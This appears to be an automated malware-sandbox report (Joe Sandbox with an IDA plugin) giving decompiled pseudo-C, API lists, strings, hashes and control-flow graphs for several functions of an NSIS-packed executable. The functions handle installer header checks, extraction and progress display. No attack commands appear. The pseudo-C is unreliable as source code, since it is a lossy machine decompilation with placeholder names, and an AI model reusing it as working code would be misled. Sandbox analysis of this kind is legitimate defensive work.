                                                							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                							E00403B3C(E0040140B(5), 1);
                                                							return _t44;
                                                						}
                                                						L22:
                                                						_t36 = 2;
                                                						return _t36;
                                                					} else {
                                                						_t78 =  *0x434f00;
                                                						 *0x433ea4 = E00401000;
                                                						 *0x433eb0 =  *0x434f00;
                                                						 *0x433eb4 = _t30;
                                                						 *0x433ec4 = 0x40a380;
                                                						if(RegisterClassW(0x433ea0) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t78 =  *(_t82 + 0x48);
                                                					_t92 = _t78;
                                                					if(_t78 == 0) {
                                                						goto L16;
                                                					}
                                                					_t76 = 0x432ea0;
                                                					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                					_t63 =  *0x432ea0; // 0x43
                                                					if(_t63 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t63 == 0x22) {
                                                						_t76 = 0x432ea2;
                                                						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                					}
                                                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                						L15:
                                                						E0040653D(0x440800, E00405E0C(_t76));
                                                						goto L16;
                                                					} else {
                                                						_t69 = GetFileAttributesW(_t76);
                                                						if(_t69 == 0xffffffff) {
                                                							L14:
                                                							E00405E58(_t76);
                                                							goto L15;
                                                						}
                                                						_t98 = _t69 & 0x00000010;
                                                						if((_t69 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}
























                                                0x00403bf2
                                                0x00403bfb
                                                0x00403c02
                                                0x00403c04
                                                0x00403c18
                                                0x00403c2a
                                                0x00403c33
                                                0x00403c3c
                                                0x00403c43
                                                0x00403c48
                                                0x00403c4f
                                                0x00403c62
                                                0x00403c62
                                                0x00403c6d
                                                0x00403c06
                                                0x00403c11
                                                0x00403c11
                                                0x00403c72
                                                0x00403c85
                                                0x00403c8a
                                                0x00403c9b
                                                0x00403d2d
                                                0x00403d35
                                                0x00403d3e
                                                0x00403d3e
                                                0x00403d54
                                                0x00403d5a
                                                0x00403d68
                                                0x00403de9
                                                0x00403df1
                                                0x00403dfb
                                                0x00403e00
                                                0x00403e06
                                                0x00403e90
                                                0x00403e95
                                                0x00403e97
                                                0x00403eb3
                                                0x00000000
                                                0x00403eb3
                                                0x00403e99
                                                0x00403e9f
                                                0x00403ea7
                                                0x00403ea7
                                                0x00000000
                                                0x00403e9f
                                                0x00403e14
                                                0x00403e1f
                                                0x00403e24
                                                0x00403e26
                                                0x00403e2d
                                                0x00403e2d
                                                0x00403e38
                                                0x00403e40
                                                0x00403e42
                                                0x00403e44
                                                0x00403e4d
                                                0x00403e50
                                                0x00403e56
                                                0x00403e56
                                                0x00403e75
                                                0x00403e86
                                                0x00000000
                                                0x00403e8b
                                                0x00403df3
                                                0x00403df5
                                                0x00000000
                                                0x00403d6a
                                                0x00403d6a
                                                0x00403d76
                                                0x00403d80
                                                0x00403d86
                                                0x00403d8b
                                                0x00403d9a
                                                0x00403eb8
                                                0x00403eb8
                                                0x00000000
                                                0x00403eb8
                                                0x00403da9
                                                0x00403de4
                                                0x00000000
                                                0x00403de4
                                                0x00403ca1
                                                0x00403ca1
                                                0x00403ca4
                                                0x00403ca6
                                                0x00000000
                                                0x00000000
                                                0x00403cb4
                                                0x00403cc6
                                                0x00403ccb
                                                0x00403cd4
                                                0x00000000
                                                0x00000000
                                                0x00403cda
                                                0x00403cdc
                                                0x00403ce9
                                                0x00403ce9
                                                0x00403cf2
                                                0x00403cf8
                                                0x00403d20
                                                0x00403d28
                                                0x00000000
                                                0x00403d0a
                                                0x00403d0b
                                                0x00403d14
                                                0x00403d1a
                                                0x00403d1b
                                                0x00000000
                                                0x00403d1b
                                                0x00403d16
                                                0x00403d18
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403d18
                                                0x00403cf8

                                                APIs
                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                • lstrcatW.KERNEL32 ref: 00403C6D
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74EDD4C4), ref: 00403CED
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                • LoadImageW.USER32 ref: 00403D54
                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                • RegisterClassW.USER32 ref: 00403D91
                                                • SystemParametersInfoW.USER32 ref: 00403DA9
                                                • CreateWindowExW.USER32 ref: 00403DDE
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403E14
                                                • GetClassInfoW.USER32 ref: 00403E40
                                                • GetClassInfoW.USER32 ref: 00403E4D
                                                • RegisterClassW.USER32 ref: 00403E56
                                                • DialogBoxParamW.USER32 ref: 00403E75
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-2633365883
                                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034e5 call 4034cf 394->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->398 395->380 397->395 421 40321f-403225 397->421 398->395 426 403264-403275 398->426 401->395 406 403143-403157 call 405fe8 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 424 403159-403160 406->424 411 4031c3-4031ca call 403019 407->411 407->412 411->412 417 4031e0-4031e8 412->417 418 4031d3-4031dd call 4069f7 412->418 417->390 425 4031ee 417->425 418->417 421->395 421->398 424->412 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->412 432 40316b-403172 430->432 431->431 434 40328b-4032a6 SetFilePointer call 405fe8 431->434 432->412 433 403174-40317b 432->433 433->412 435 40317d-40319d 433->435 438 4032ab 434->438 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->425 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                                                C-Code - Quality: 78%
                                                			E0040307D(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t50;
                                                				void* _t53;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				long _t70;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				void* _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				long _t90;
                                                				long _t93;
                                                				void* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				 *0x434f0c = GetTickCount() + 0x3e8;
                                                				GetModuleFileNameW(0, 0x443800, 0x400);
                                                				_t89 = E0040602D(0x443800, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x40a018 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return L"Error launching installer";
                                                				}
                                                				E0040653D(0x441800, 0x443800);
                                                				E0040653D(0x444000, E00405E58(0x441800));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				 *0x42aa24 = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00403019(1);
                                                					if( *0x434f14 == _t82) {
                                                						goto L29;
                                                					}
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t34 =  &_v24; // 0x40387d
                                                						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                						_t94 = _t53;
                                                						E004034E5( *0x434f14 + 0x1c);
                                                						_t35 =  &_v24; // 0x40387d
                                                						_push( *_t35);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff); // executed
                                                						_t57 = E004032B4(); // executed
                                                						if(_t57 == _v24) {
                                                							 *0x434f10 = _t94;
                                                							 *0x434f18 =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x434f1c =  *0x434f1c + 1;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E004034E5( *0x41ea18);
                                                					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
                                                						goto L29;
                                                					} else {
                                                						goto L28;
                                                					}
                                                				} else {
                                                					do {
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						if(E004034CF(0x416a18, _t90) == 0) {
                                                							E00403019(1);
                                                							L29:
                                                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						if( *0x434f14 != 0) {
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00403019(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                						_t77 = _v44;
                                                						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                							_a4 = _a4 | _t77;
                                                							_t87 =  *0x41ea18; // 0x283e7
                                                							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                							_t80 = _v20;
                                                							 *0x434f14 = _t87;
                                                							if(_t80 > _t93) {
                                                								goto L29;
                                                							}
                                                							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                								_v8 = _v8 + 1;
                                                								_t93 = _t80 - 4;
                                                								if(_t90 > _t93) {
                                                									_t90 = _t93;
                                                								}
                                                								goto L20;
                                                							} else {
                                                								break;
                                                							}
                                                						}
                                                						L20:
                                                						if(_t93 <  *0x42aa24) {
                                                							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                						}
                                                						 *0x41ea18 =  *0x41ea18 + _t90;
                                                						_t93 = _t93 - _t90;
                                                					} while (_t93 != 0);
                                                					_t82 = 0;
                                                					goto L24;
                                                				}
                                                			}




























                                                0x00403085
                                                0x00403088
                                                0x0040308b
                                                0x004030a5
                                                0x004030aa
                                                0x004030bd
                                                0x004030c2
                                                0x004030c5
                                                0x004030cb
                                                0x00000000
                                                0x004030cd
                                                0x004030de
                                                0x004030ef
                                                0x004030f6
                                                0x004030fe
                                                0x00403103
                                                0x00403105
                                                0x004031f0
                                                0x004031f2
                                                0x004031fe
                                                0x00000000
                                                0x00000000
                                                0x00403203
                                                0x00403227
                                                0x00403227
                                                0x0040322c
                                                0x00403232
                                                0x0040323d
                                                0x00403242
                                                0x00403242
                                                0x00403245
                                                0x00403246
                                                0x00403247
                                                0x00403249
                                                0x00403251
                                                0x00403268
                                                0x00403270
                                                0x00403275
                                                0x00403277
                                                0x00403277
                                                0x0040327f
                                                0x0040327f
                                                0x00403282
                                                0x00403283
                                                0x00403283
                                                0x00403286
                                                0x00403288
                                                0x00403288
                                                0x00403292
                                                0x00403298
                                                0x004032a6
                                                0x00000000
                                                0x004032ab
                                                0x00000000
                                                0x00403251
                                                0x0040320b
                                                0x0040321d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040310b
                                                0x00403110
                                                0x00403115
                                                0x00403119
                                                0x00403120
                                                0x00403127
                                                0x00403129
                                                0x00403129
                                                0x00403134
                                                0x0040325c
                                                0x00403253
                                                0x00000000
                                                0x00403253
                                                0x00403141
                                                0x004031c1
                                                0x004031c5
                                                0x004031ca
                                                0x00000000
                                                0x004031c1
                                                0x0040314a
                                                0x0040314f
                                                0x00403157
                                                0x0040317d
                                                0x00403183
                                                0x0040318c
                                                0x00403192
                                                0x00403197
                                                0x0040319d
                                                0x00000000
                                                0x00000000
                                                0x004031a7
                                                0x004031af
                                                0x004031b2
                                                0x004031b7
                                                0x004031b9
                                                0x004031b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031a7
                                                0x004031cb
                                                0x004031d1
                                                0x004031dd
                                                0x004031dd
                                                0x004031e0
                                                0x004031e6
                                                0x004031e6
                                                0x004031ee
                                                0x00000000
                                                0x004031ee

                                                APIs
                                                • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000,?,?,?,?,?,0040387D,?), ref: 0040308E
                                                • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                Strings
                                                • Inst, xrefs: 00403162
                                                • Error launching installer, xrefs: 004030CD
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
                                                • soft, xrefs: 0040316B
                                                • }8@, xrefs: 00403227, 00403242
                                                • Null, xrefs: 00403174
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                • API String ID: 2803837635-3947366757
                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 727 4032b4-4032cb 728 4032d4-4032dd 727->728 729 4032cd 727->729 730 4032e6-4032eb 728->730 731 4032df 728->731 729->728 732 4032fb-403308 call 4034cf 730->732 733 4032ed-4032f6 call 4034e5 730->733 731->730 737 4034bd 732->737 738 40330e-403312 732->738 733->732 739 4034bf-4034c0 737->739 740 403468-40346a 738->740 741 403318-403361 GetTickCount 738->741 744 4034c8-4034cc 739->744 742 4034aa-4034ad 740->742 743 40346c-40346f 740->743 745 4034c5 741->745 746 403367-40336f 741->746 747 4034b2-4034bb call 4034cf 742->747 748 4034af 742->748 743->745 749 403471 743->749 745->744 750 403371 746->750 751 403374-403382 call 4034cf 746->751 747->737 760 4034c2 747->760 748->747 753 403474-40347a 749->753 750->751 751->737 759 403388-403391 751->759 756 40347c 753->756 757 40347e-40348c call 4034cf 753->757 756->757 757->737 765 40348e-40349a call 4060df 757->765 762 403397-4033b7 call 406a65 759->762 760->745 769 403460-403462 762->769 770 4033bd-4033d0 GetTickCount 762->770 771 403464-403466 765->771 772 40349c-4034a6 765->772 769->739 773 4033d2-4033da 770->773 774 40341b-40341d 770->774 771->739 772->753 775 4034a8 772->775 776 4033e2-403413 MulDiv wsprintfW call 40559f 773->776 777 4033dc-4033e0 773->777 778 403454-403458 774->778 779 40341f-403423 774->779 775->745 785 403418 776->785 777->774 777->776 778->746 780 40345e 778->780 782 403425-40342c call 4060df 779->782 783 40343a-403445 779->783 780->745 788 403431-403433 782->788 784 403448-40344c 783->784 784->762 787 403452 784->787 785->774 787->745 788->771 789 403435-403438 788->789 789->784
                                                C-Code - Quality: 95%
                                                			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				int _v12;
                                                				intOrPtr _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				short _v152;
                                                				void* _t65;
                                                				long _t70;
                                                				intOrPtr _t75;
                                                				long _t76;
                                                				intOrPtr _t77;
                                                				void* _t78;
                                                				int _t88;
                                                				intOrPtr _t92;
                                                				intOrPtr _t95;
                                                				long _t96;
                                                				signed int _t97;
                                                				int _t98;
                                                				int _t99;
                                                				intOrPtr _t100;
                                                				void* _t101;
                                                				void* _t102;
                                                
                                                				_t97 = _a16;
                                                				_t92 = _a12;
                                                				_v12 = _t97;
                                                				if(_t92 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_v16 = _t92;
                                                				if(_t92 == 0) {
                                                					_v16 = 0x422a20;
                                                				}
                                                				_t62 = _a4;
                                                				if(_a4 >= 0) {
                                                					E004034E5( *0x434f58 + _t62);
                                                				}
                                                				if(E004034CF( &_a16, 4) == 0) {
                                                					L41:
                                                					_push(0xfffffffd);
                                                					goto L42;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t92 != 0) {
                                                							if(_a16 < _t97) {
                                                								_t97 = _a16;
                                                							}
                                                							if(E004034CF(_t92, _t97) != 0) {
                                                								_v8 = _t97;
                                                								L44:
                                                								return _v8;
                                                							} else {
                                                								goto L41;
                                                							}
                                                						}
                                                						if(_a16 <= _t92) {
                                                							goto L44;
                                                						}
                                                						_t88 = _v12;
                                                						while(1) {
                                                							_t98 = _a16;
                                                							if(_a16 >= _t88) {
                                                								_t98 = _t88;
                                                							}
                                                							if(E004034CF(0x41ea20, _t98) == 0) {
                                                								goto L41;
                                                							}
                                                							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                                                								L28:
                                                								_push(0xfffffffe);
                                                								L42:
                                                								_pop(_t65);
                                                								return _t65;
                                                							}
                                                							_v8 = _v8 + _t98;
                                                							_a16 = _a16 - _t98;
                                                							if(_a16 > 0) {
                                                								continue;
                                                							}
                                                							goto L44;
                                                						}
                                                						goto L41;
                                                					}
                                                					_t70 = GetTickCount();
                                                					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                					_t14 =  &_a16;
                                                					 *_t14 = _a16 & 0x7fffffff;
                                                					_v20 = _t70;
                                                					 *0x40ce68 = 8;
                                                					 *0x416a10 = 0x40ea08;
                                                					 *0x416a0c = 0x40ea08;
                                                					 *0x416a08 = 0x416a08;
                                                					_a4 = _a16;
                                                					if( *_t14 <= 0) {
                                                						goto L44;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t99 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t99 = _a16;
                                                						}
                                                						if(E004034CF(0x41ea20, _t99) == 0) {
                                                							goto L41;
                                                						}
                                                						_a16 = _a16 - _t99;
                                                						 *0x40ce58 = 0x41ea20;
                                                						 *0x40ce5c = _t99;
                                                						while(1) {
                                                							_t95 = _v16;
                                                							 *0x40ce60 = _t95;
                                                							 *0x40ce64 = _v12;
                                                							_t75 = E00406A65(0x40ce58);
                                                							_v24 = _t75;
                                                							if(_t75 < 0) {
                                                								break;
                                                							}
                                                							_t100 =  *0x40ce60; // 0x425a20
                                                							_t101 = _t100 - _t95;
                                                							_t76 = GetTickCount();
                                                							_t96 = _t76;
                                                							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t102 = _t102 + 0xc;
                                                								E0040559F(0,  &_v152); // executed
                                                								_v20 = _t96;
                                                							}
                                                							if(_t101 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L44;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_t77 =  *0x40ce60; // 0x425a20
                                                									_v8 = _v8 + _t101;
                                                									_v12 = _v12 - _t101;
                                                									_v16 = _t77;
                                                									L23:
                                                									if(_v24 != 1) {
                                                										continue;
                                                									}
                                                									goto L44;
                                                								}
                                                								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                								if(_t78 == 0) {
                                                									goto L28;
                                                								}
                                                								_v8 = _v8 + _t101;
                                                								goto L23;
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L42;
                                                					}
                                                					goto L41;
                                                				}
                                                			}

























                                                0x004032bf
                                                0x004032c3
                                                0x004032c6
                                                0x004032cb
                                                0x004032cd
                                                0x004032cd
                                                0x004032d4
                                                0x004032d8
                                                0x004032dd
                                                0x004032df
                                                0x004032df
                                                0x004032e6
                                                0x004032eb
                                                0x004032f6
                                                0x004032f6
                                                0x00403308
                                                0x004034bd
                                                0x004034bd
                                                0x00000000
                                                0x0040330e
                                                0x00403312
                                                0x0040346a
                                                0x004034ad
                                                0x004034af
                                                0x004034af
                                                0x004034bb
                                                0x004034c2
                                                0x004034c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004034bb
                                                0x0040346f
                                                0x00000000
                                                0x00000000
                                                0x00403471
                                                0x00403474
                                                0x00403477
                                                0x0040347a
                                                0x0040347c
                                                0x0040347c
                                                0x0040348c
                                                0x00000000
                                                0x00000000
                                                0x0040349a
                                                0x00403464
                                                0x00403464
                                                0x004034bf
                                                0x004034bf
                                                0x00000000
                                                0x004034bf
                                                0x0040349c
                                                0x0040349f
                                                0x004034a6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004034a8
                                                0x00000000
                                                0x00403474
                                                0x0040331e
                                                0x00403320
                                                0x00403327
                                                0x0040332e
                                                0x0040332e
                                                0x00403335
                                                0x0040333d
                                                0x00403347
                                                0x0040334c
                                                0x00403354
                                                0x0040335e
                                                0x00403361
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403367
                                                0x00403367
                                                0x00403367
                                                0x0040336f
                                                0x00403371
                                                0x00403371
                                                0x00403382
                                                0x00000000
                                                0x00000000
                                                0x00403388
                                                0x0040338b
                                                0x00403391
                                                0x00403397
                                                0x00403397
                                                0x004033a2
                                                0x004033a8
                                                0x004033ad
                                                0x004033b4
                                                0x004033b7
                                                0x00000000
                                                0x00000000
                                                0x004033bd
                                                0x004033c3
                                                0x004033c5
                                                0x004033ce
                                                0x004033d0
                                                0x00403401
                                                0x00403407
                                                0x00403413
                                                0x00403418
                                                0x00403418
                                                0x0040341d
                                                0x00403458
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040341f
                                                0x00403423
                                                0x0040343a
                                                0x0040343f
                                                0x00403442
                                                0x00403445
                                                0x00403448
                                                0x0040344c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403452
                                                0x0040342c
                                                0x00403433
                                                0x00000000
                                                0x00000000
                                                0x00403435
                                                0x00000000
                                                0x00403435
                                                0x0040341d
                                                0x00403460
                                                0x00000000
                                                0x00403460
                                                0x00000000
                                                0x00403367

                                                APIs
                                                • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 0040331E
                                                • GetTickCount.KERNEL32(0040CE58,0041EA20,00004000), ref: 004033C5
                                                • MulDiv.KERNEL32 ref: 004033EE
                                                • wsprintfW.USER32 ref: 00403401
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                • API String ID: 551687249-3683892814
                                                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
